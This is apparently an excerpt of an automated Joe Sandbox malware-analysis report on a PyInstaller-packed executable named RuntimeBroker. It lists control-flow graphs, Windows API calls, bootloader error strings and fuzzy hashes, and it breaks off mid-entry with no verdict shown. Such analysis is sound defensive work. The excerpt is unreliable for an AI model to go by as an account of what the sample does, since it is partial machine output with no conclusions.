call 7ff72b056b00 95->101 107 7ff72b053708-7ff72b05370a 97->107 98->76 100->101 104 7ff72b053a50-7ff72b053a58 100->104 118 7ff72b0538ee-7ff72b0538f4 101->118 119 7ff72b053947-7ff72b05394a call 7ff72b056510 101->119 108 7ff72b053a7d-7ff72b053a92 call 7ff72b0533d0 call 7ff72b053080 call 7ff72b0533a0 104->108 109 7ff72b053a5a-7ff72b053a77 PostMessageW GetMessageW 104->109 107->44 131 7ff72b053a97-7ff72b053aaf call 7ff72b056780 call 7ff72b056510 108->131 109->108 110->53 122 7ff72b05390e-7ff72b053918 call 7ff72b056970 118->122 123 7ff72b0538f6-7ff72b053903 call 7ff72b0565a0 118->123 125 7ff72b05394f-7ff72b053956 119->125 134 7ff72b05391a-7ff72b053921 122->134 135 7ff72b053923-7ff72b053931 call 7ff72b056cd0 122->135 123->122 132 7ff72b053905-7ff72b05390c 123->132 125->104 129 7ff72b05395c-7ff72b053966 call 7ff72b0530e0 125->129 129->107 141 7ff72b05396c-7ff72b053980 call 7ff72b0583e0 129->141 137 7ff72b05393a-7ff72b053942 call 7ff72b052870 call 7ff72b056780 132->137 134->137 135->125 147 7ff72b053933 135->147 137->119 151 7ff72b0539a5-7ff72b0539e8 call 7ff72b057f20 call 7ff72b057fc0 call 7ff72b056780 call 7ff72b056510 call 7ff72b057ec0 141->151 152 7ff72b053982-7ff72b05399f PostMessageW GetMessageW 141->152 147->137 163 7ff72b053a3d-7ff72b053a4b call 7ff72b0518a0 151->163 164 7ff72b0539ea-7ff72b053a00 call 7ff72b0581f0 call 7ff72b057ec0 151->164 152->151 163->107 164->163 171 7ff72b053a02-7ff72b053a10 164->171 172 7ff72b053a31-7ff72b053a38 call 7ff72b052870 171->172 173 7ff72b053a12-7ff72b053a2c call 7ff72b0525f0 call 7ff72b0518a0 171->173 172->163 173->107
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName
                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                                • API String ID: 514040917-585287483
                                                                                                                                                                                • Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                                                                                                                • Instruction ID: c6cbb027dc0dd18342b7ebaadd52c9beb44e986c02aa15b1d28176b441667dbe
                                                                                                                                                                                • Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF16061A0868251FA3AF728DD942F9E351FF44780FC48431DA5E43AB6EF2CE554DB60

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 359 7ff72b075c74-7ff72b075ce7 call 7ff72b0759a8 362 7ff72b075ce9-7ff72b075cf2 call 7ff72b0643d4 359->362 363 7ff72b075d01-7ff72b075d0b call 7ff72b067830 359->363 368 7ff72b075cf5-7ff72b075cfc call 7ff72b0643f4 362->368 369 7ff72b075d0d-7ff72b075d24 call 7ff72b0643d4 call 7ff72b0643f4 363->369 370 7ff72b075d26-7ff72b075d8f CreateFileW 363->370 386 7ff72b076042-7ff72b076062 368->386 369->368 372 7ff72b075e0c-7ff72b075e17 GetFileType 370->372 373 7ff72b075d91-7ff72b075d97 370->373 379 7ff72b075e19-7ff72b075e54 GetLastError call 7ff72b064368 CloseHandle 372->379 380 7ff72b075e6a-7ff72b075e71 372->380 376 7ff72b075dd9-7ff72b075e07 GetLastError call 7ff72b064368 373->376 377 7ff72b075d99-7ff72b075d9d 373->377 376->368 377->376 384 7ff72b075d9f-7ff72b075dd7 CreateFileW 377->384 379->368 394 7ff72b075e5a-7ff72b075e65 call 7ff72b0643f4 379->394 382 7ff72b075e79-7ff72b075e7c 380->382 383 7ff72b075e73-7ff72b075e77 380->383 389 7ff72b075e82-7ff72b075ed7 call 7ff72b067748 382->389 390 7ff72b075e7e 382->390 383->389 384->372 384->376 398 7ff72b075ed9-7ff72b075ee5 call 7ff72b075bb0 389->398 399 7ff72b075ef6-7ff72b075f27 call 7ff72b075728 389->399 390->389 394->368 398->399 406 7ff72b075ee7 398->406 404 7ff72b075f2d-7ff72b075f6f 399->404 405 7ff72b075f29-7ff72b075f2b 399->405 408 7ff72b075f91-7ff72b075f9c 404->408 409 7ff72b075f71-7ff72b075f75 404->409 407 7ff72b075ee9-7ff72b075ef1 call 7ff72b069dd0 405->407 406->407 407->386 411 7ff72b075fa2-7ff72b075fa6 408->411 412 7ff72b076040 408->412 409->408 410 7ff72b075f77-7ff72b075f8c 409->410 410->408 411->412 414 7ff72b075fac-7ff72b075ff1 CloseHandle CreateFileW 411->414 412->386 416 7ff72b076026-7ff72b07603b 414->416 417 7ff72b075ff3-7ff72b076021 GetLastError call 7ff72b064368 call 7ff72b067970 414->417 416->412 417->416
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                • Instruction ID: 112f096b2e6b38bd1263995ab04dd34f4cd571bdbe07d92a4589d685040b76e9
                                                                                                                                                                                • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                                • Instruction Fuzzy Hash: 56C1D032B28A4186EB21DF68C8906BCB761FB49B98B810225DF1E577E5CF38E451D750
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                • Instruction ID: 680089955e522658c82d14722b38f44ac43070911214bb8180b7f320603f6d4d
                                                                                                                                                                                • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F04422A1974186F771AB68B89D766B350FB44768F840235DA6D02AE4DF3CE0598F14

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 179 7ff72b0518f0-7ff72b05192b call 7ff72b053f70 182 7ff72b051bc1-7ff72b051be5 call 7ff72b05b870 179->182 183 7ff72b051931-7ff72b051971 call 7ff72b0576a0 179->183 188 7ff72b051bae-7ff72b051bb1 call 7ff72b05f36c 183->188 189 7ff72b051977-7ff72b051987 call 7ff72b05f9f4 183->189 192 7ff72b051bb6-7ff72b051bbe 188->192 194 7ff72b051989-7ff72b05199c call 7ff72b052760 189->194 195 7ff72b0519a1-7ff72b0519bd call 7ff72b05f6bc 189->195 192->182 194->188 200 7ff72b0519d7-7ff72b0519ec call 7ff72b064154 195->200 201 7ff72b0519bf-7ff72b0519d2 call 7ff72b052760 195->201 206 7ff72b0519ee-7ff72b051a01 call 7ff72b052760 200->206 207 7ff72b051a06-7ff72b051a87 call 7ff72b051bf0 * 2 call 7ff72b05f9f4 200->207 201->188 206->188 215 7ff72b051a8c-7ff72b051a9f call 7ff72b064170 207->215 218 7ff72b051ab9-7ff72b051ad2 call 7ff72b05f6bc 215->218 219 7ff72b051aa1-7ff72b051ab4 call 7ff72b052760 215->219 224 7ff72b051aec-7ff72b051b08 call 7ff72b05f430 218->224 225 7ff72b051ad4-7ff72b051ae7 call 7ff72b052760 218->225 219->188 230 7ff72b051b1b-7ff72b051b29 224->230 231 7ff72b051b0a-7ff72b051b16 call 7ff72b0525f0 224->231 225->188 230->188 233 7ff72b051b2f-7ff72b051b3e 230->233 231->188 235 7ff72b051b40-7ff72b051b46 233->235 236 7ff72b051b48-7ff72b051b55 235->236 237 7ff72b051b60-7ff72b051b6f 235->237 238 7ff72b051b71-7ff72b051b7a 236->238 237->237 237->238 239 7ff72b051b7c-7ff72b051b7f 238->239 240 7ff72b051b8f 238->240 239->240 242 7ff72b051b81-7ff72b051b84 239->242 241 7ff72b051b91-7ff72b051bac 240->241 241->188 241->235 242->240 243 7ff72b051b86-7ff72b051b89 242->243 243->240 244 7ff72b051b8b-7ff72b051b8d 243->244 244->241
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _fread_nolock$Message
                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 677216364-3497178890
                                                                                                                                                                                • Opcode ID: 990526d2b1a7d467b5ebf7f65c940fc4e17f25d2fa33dc3a7eebd26d0dc5cb7f
                                                                                                                                                                                • Instruction ID: 776e62adcac866bfbccf858c2dc779fd04f58f663f8d478aa28dd13a46b3d767
                                                                                                                                                                                • Opcode Fuzzy Hash: 990526d2b1a7d467b5ebf7f65c940fc4e17f25d2fa33dc3a7eebd26d0dc5cb7f
                                                                                                                                                                                • Instruction Fuzzy Hash: D4718771A1868695FB72EB1CD8902B9E391FF48B84F844035D98D47BA5EE2CE5858F20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                • API String ID: 2030045667-3659356012
                                                                                                                                                                                • Opcode ID: c905a55cd8f7984cb7268f8667bb52af5d1a529dc0f7b0aa3d5b3112cccbc6ce
                                                                                                                                                                                • Instruction ID: cc7eb8a895af5d21d6c8d2f38b358e7b3d4252bfbe6d0cc80e57d439a4af5606
                                                                                                                                                                                • Opcode Fuzzy Hash: c905a55cd8f7984cb7268f8667bb52af5d1a529dc0f7b0aa3d5b3112cccbc6ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B416121B0864281EA32BB19AC915BAE390FF487D4FD44431DE4D47EB5EE3CE9459F10

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                • API String ID: 2030045667-2813020118
                                                                                                                                                                                • Opcode ID: 3a131130df1bedf4a22d54e8333a8cd57b9bb3243cddf7f37edab8269c788e58
                                                                                                                                                                                • Instruction ID: 816ac3cef8c3e02c27e524ba84ecdd96675152057e8b172679f087e8ff222af3
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a131130df1bedf4a22d54e8333a8cd57b9bb3243cddf7f37edab8269c788e58
                                                                                                                                                                                • Instruction Fuzzy Hash: A451A362A0864245EA72BB19AC903BAE291FF85794F844135DE4D47FE5EF3CE941CF20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E19C
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF72B06E3BA,?,?,-00000018,00007FF72B06A063,?,?,?,00007FF72B069F5A,?,?,?,00007FF72B06524E), ref: 00007FF72B06E1A8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                • Instruction ID: c29af694b380f90edae54ea361c0482262d6b7f358b6779e58d424d0fe77a646
                                                                                                                                                                                • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C41D531B1570281FA37AB1AAC14676A391FF49B90FC84539DE0D4B7B4EE3CE5459B20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 577 7ff72b06ad6c-7ff72b06ad92 578 7ff72b06adad-7ff72b06adb1 577->578 579 7ff72b06ad94-7ff72b06ada8 call 7ff72b0643d4 call 7ff72b0643f4 577->579 581 7ff72b06b187-7ff72b06b193 call 7ff72b0643d4 call 7ff72b0643f4 578->581 582 7ff72b06adb7-7ff72b06adbe 578->582 595 7ff72b06b19e 579->595 601 7ff72b06b199 call 7ff72b069bf0 581->601 582->581 584 7ff72b06adc4-7ff72b06adf2 582->584 584->581 587 7ff72b06adf8-7ff72b06adff 584->587 590 7ff72b06ae18-7ff72b06ae1b 587->590 591 7ff72b06ae01-7ff72b06ae13 call 7ff72b0643d4 call 7ff72b0643f4 587->591 593 7ff72b06b183-7ff72b06b185 590->593 594 7ff72b06ae21-7ff72b06ae27 590->594 591->601 598 7ff72b06b1a1-7ff72b06b1b8 593->598 594->593 599 7ff72b06ae2d-7ff72b06ae30 594->599 595->598 599->591 603 7ff72b06ae32-7ff72b06ae57 599->603 601->595 606 7ff72b06ae59-7ff72b06ae5b 603->606 607 7ff72b06ae8a-7ff72b06ae91 603->607 610 7ff72b06ae5d-7ff72b06ae64 606->610 611 7ff72b06ae82-7ff72b06ae88 606->611 608 7ff72b06ae66-7ff72b06ae7d call 7ff72b0643d4 call 7ff72b0643f4 call 7ff72b069bf0 607->608 609 7ff72b06ae93-7ff72b06ae9f call 7ff72b06c90c 607->609 643 7ff72b06b010 608->643 617 7ff72b06aea4-7ff72b06aebb call 7ff72b069c58 * 2 609->617 610->608 610->611 614 7ff72b06af08-7ff72b06af1f 611->614 615 7ff72b06af9a-7ff72b06afa4 call 7ff72b072c2c 614->615 616 7ff72b06af21-7ff72b06af29 614->616 629 7ff72b06b02e 615->629 630 7ff72b06afaa-7ff72b06afbf 615->630 616->615 619 7ff72b06af2b-7ff72b06af2d 616->619 638 7ff72b06aebd-7ff72b06aed3 call 7ff72b0643f4 call 7ff72b0643d4 617->638 639 7ff72b06aed8-7ff72b06af03 call 7ff72b06b594 617->639 619->615 623 7ff72b06af2f-7ff72b06af45 619->623 623->615 627 7ff72b06af47-7ff72b06af53 623->627 627->615 632 7ff72b06af55-7ff72b06af57 627->632 634 7ff72b06b033-7ff72b06b053 ReadFile 629->634 630->629 635 7ff72b06afc1-7ff72b06afd3 GetConsoleMode 630->635 632->615 637 7ff72b06af59-7ff72b06af71 632->637 640 7ff72b06b14d-7ff72b06b156 GetLastError 634->640 641 7ff72b06b059-7ff72b06b061 634->641 635->629 642 7ff72b06afd5-7ff72b06afdd 635->642 637->615 647 7ff72b06af73-7ff72b06af7f 637->647 638->643 639->614 644 7ff72b06b158-7ff72b06b16e call 7ff72b0643f4 call 7ff72b0643d4 640->644 645 7ff72b06b173-7ff72b06b176 640->645 641->640 649 7ff72b06b067 641->649 642->634 651 7ff72b06afdf-7ff72b06b001 ReadConsoleW 642->651 646 7ff72b06b013-7ff72b06b01d call 7ff72b069c58 643->646 644->643 657 7ff72b06b17c-7ff72b06b17e 645->657 658 7ff72b06b009-7ff72b06b00b call 7ff72b064368 645->658 646->598 647->615 656 7ff72b06af81-7ff72b06af83 647->656 660 7ff72b06b06e-7ff72b06b083 649->660 652 7ff72b06b003 GetLastError 651->652 653 7ff72b06b022-7ff72b06b02c 651->653 652->658 653->660 656->615 665 7ff72b06af85-7ff72b06af95 656->665 657->646 658->643 660->646 667 7ff72b06b085-7ff72b06b090 660->667 665->615 670 7ff72b06b0b7-7ff72b06b0bf 667->670 671 7ff72b06b092-7ff72b06b0ab call 7ff72b06a984 667->671 672 7ff72b06b13b-7ff72b06b148 call 7ff72b06a7c4 670->672 673 7ff72b06b0c1-7ff72b06b0d3 670->673 676 7ff72b06b0b0-7ff72b06b0b2 671->676 672->676 677 7ff72b06b12e-7ff72b06b136 673->677 678 7ff72b06b0d5 673->678 676->646 677->646 681 7ff72b06b0da-7ff72b06b0e1 678->681 682 7ff72b06b11d-7ff72b06b128 681->682 683 7ff72b06b0e3-7ff72b06b0e7 681->683 682->677 684 7ff72b06b0e9-7ff72b06b0f0 683->684 685 7ff72b06b103 683->685 684->685 686 7ff72b06b0f2-7ff72b06b0f6 684->686 687 7ff72b06b109-7ff72b06b119 685->687 686->685 688 7ff72b06b0f8-7ff72b06b101 686->688 687->681 689 7ff72b06b11b 687->689 688->687 689->677
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                • Opcode ID: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                • Instruction ID: c05628facd73e5f65f9d56ef1470d49cacb86d7f1aecf9c9d039b9a41bce306e
                                                                                                                                                                                • Opcode Fuzzy Hash: 61b7c791dd7b4870e419cd94b23561cebff66563b6152af2ba6a1b175460b8f9
                                                                                                                                                                                • Instruction Fuzzy Hash: C0C1F462F0C68651E672BB1D98413BEBB90FB98B80FD90139DA5D077B1CE7CE4558B20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF72B053534), ref: 00007FF72B053411
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: GetLastError.KERNEL32(?,?,?,00007FF72B05342E,?,00007FF72B053534), ref: 00007FF72B052A14
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: FormatMessageW.KERNEL32(?,?,?,00007FF72B05342E), ref: 00007FF72B052A7D
                                                                                                                                                                                  • Part of subcall function 00007FF72B0529E0: MessageBoxW.USER32 ref: 00007FF72B052ACF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                • API String ID: 517058245-2863816727
                                                                                                                                                                                • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                • Instruction ID: 815b5bee0a0bd1a792fd4d617f62d4ac7f45312321708e4e32c9fc018b95912e
                                                                                                                                                                                • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                • Instruction Fuzzy Hash: A5212C61B1864691FA32BB28EC913B9D350FF49394FC04136D69E869F5EE2CF5058F20

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
